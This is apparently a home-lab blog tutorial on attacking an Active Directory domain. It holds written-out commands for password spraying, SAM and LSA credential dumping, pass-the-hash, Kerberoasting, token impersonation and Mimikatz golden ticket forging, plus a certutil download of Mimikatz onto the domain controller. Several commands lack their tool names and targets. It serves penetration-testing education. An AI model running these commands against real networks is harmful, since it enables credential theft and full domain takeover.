AD Attack Lab Part Four (Pass The Hash, Token Impersonation, Kerberoasting, Mimikatz, and Golden Ticket attacks)


In this post, we will explore the Pass-The-Hash attack, Token Impersonation attack, Kerberoasting attack, Mimikatz attack, and Golden ticket attack in an AD environment. If you haven’t set up the lab yet, follow Part One and Part Two to get your lab setup.

Pass The Hash Attack

The Pass-The-Hash attack essentially is an attack that allows an attacker who has gained a foothold in a network to pass the dumped NTLM hash around. This usually involves an attacker dumped the victim machines NTLM hash and a perform password spraying attack. Let us see how we can perform this attack in our lab environment.

I will use “CrackMapExec” and “” from Impacket for the purpose of this lab. If you have not installed Impacket, head over to Part Two and get the Impacket installed on your Kali machine.

Install CrackMapExec

sudo python3 -m pip install pipx
sudo pipx ensurepath
sudo apt-get install python3-venv
sudo pipx install crackmapexec
sudo pipx ensurepath
sudo su


Pass The Password/Hashes With CrackMapExec

The CrackMapExec allows us to pass the plain-text password to the network to perform a password spraying. We will use the plain-text password for the user “Beauden Wallis” we created early to against the whole network range. The situation here is we assume the credential of the domain user “Beauden Wallis” has been compromised, the attacker is trying to use the credential to see what other workstation or username can be logged in with this set of the password.

crackmapexec smb -u bwallis -d KUDOS.local -p P@ssWord!


The “Green Plus” shows with the credential we supplied, the two workstations, and the domain controller all can be accessed. Let’s dump the SAM database and get the hash we need.

crackmapexec smb -u bwallis -d KUDOS.local -p P@ssWord! --sam


We can use “” to get a SYSTEM shell with the credential we had for domain user “Beauden Wallis”. kudos.local/bwallis:P@ssWord\!@


The “” from Impacket can also be used for dumping the SAM database. kudos.local/bwallis:P@ssWord\!@ kudos.local/bwallis:P@ssWord\!@


Save the User account hashes into a text file.


Let us see if we can crack the three hashes we obtained with Hashcat.

hashcat -m 1000 hash-crack rockyou.txt --force


We see only one hash was being cracked with wordlist “rockyou.txt”, which is the administrator account’s password. Now, let’s see if we can use the Pass-The-Hash technique on the network to gain access.

crackmapexec smb -u calcock -H 924572879ba3b163cc44e0abc5af208a --local-auth
crackmapexec smb -u bwallis -H cbe6872995bc342778fc13ce339770ea --local-auth

PTH bwallis:@ -hashes aad3b435b51404eeaad3b435b51404ee:cbe6872995bc342778fc13ce339770ea

We can see “DESKTOP-USER1” is logged in with local user “bwallis” and “DESKTOP-USER2” with user “calcock”. Now, let’s use “” to pop a SYSTEM shell.


Token Impersonation Attack

Token impersonation essentially allows an attacker to impersonate another logged-in user on the current session until the next reboot, which means if a domain administrator user is logged-in to a workstation where the attacker has a foothold, the attacker can impersonate the domain administrator and take over the whole network.

Use “windows/smb/psexec” in Metasploit to get a Meterpreter shell on one of the Windows 10 machines.


Load the “incognito” module into the current Meterpreter session.

load incognito


List currently available token for the logged-in accounts.

list_tokens -u


We can impersonate account “bwallis” since it was logged-in.

impersonate_token KUDOS\\bwallis


We can also back to the previous Meterpreter session with “rev2self”. We see we do not have the proper access to dump the SAM database in the impersonated account.


Loggin as the domain administrator, a new administrator token is available for us to impersonate.


Kerberoasting Attack

Kerberoasting Attack allows an attacker to forge or steal a TGS and potentially crack the encryption password offline.

Request a TGS for the SQL service account we set up early. The “” is from Impacket toolkit. kudos.local/bwallis:P@ssWord\! -dc-ip -request


Identify the mode we are going to use to crack the TGS.

hashcat --help | grep Kerb


I have made a wordlist for the purpose of this lab.


Crack the TGS:

hashcat -m 13100 kerb-hash wordlists --force


Mimikatz and Golden Ticket Attack

Mimikatz can perform a wide variety of attacks related to Windows credentials and Kerberos tickets.

Download the Mimikatz to kali then transfer to the Domain Controller.

sudo python -m SimpleHTTPServer 80
certutil.exe -urlcache -f

Mimikatz Mimikatz Mimikatz

Check if we have administrator privilege to run the Mimikatz.


Dumping the logon users’ password.



Try to dump the SAM database. We see it doesn’t work since we are not under SYSTEM privilege. In this case, we can use psexec to get a SYSTEM shell and dump the SAM database from there.

lsadump::sam /patch

Mimikatz Mimikatz

Dumping the SAM with the “lsadump::lsa /patch”.

lsadump::lsa /patch


We can also use the Mimikatz to perform the golden ticket attack with “krbtgt” account, essentially it will give us a command prompt that allows us to access any computers in the domain.

Obtain the credentials for “krbtgt” account:

lsadump::lsa /inject /name:krbtgt


Generate our golden ticket for the current session, note the hashes and SID we obtained when dumping the “krbtgt” account.

kerberos::golden /User:Administrator /domain:kudos.local /sid:S-1-5-21-1510980245-1658837649-3915912440 /krbtgt:91829003942208c879f83073fb387c5f /id:500 /ptt


Open a command prompt contains this TGT, which allows us to access any computers in the domain.

dir \\DESKTOP-USER2\c$

Mimikatz Mimikatz

We examined several interesting attacks against the misconfigured AD environment. In future posts, I will discuss how we can detect these attacks. Thanks for reading :)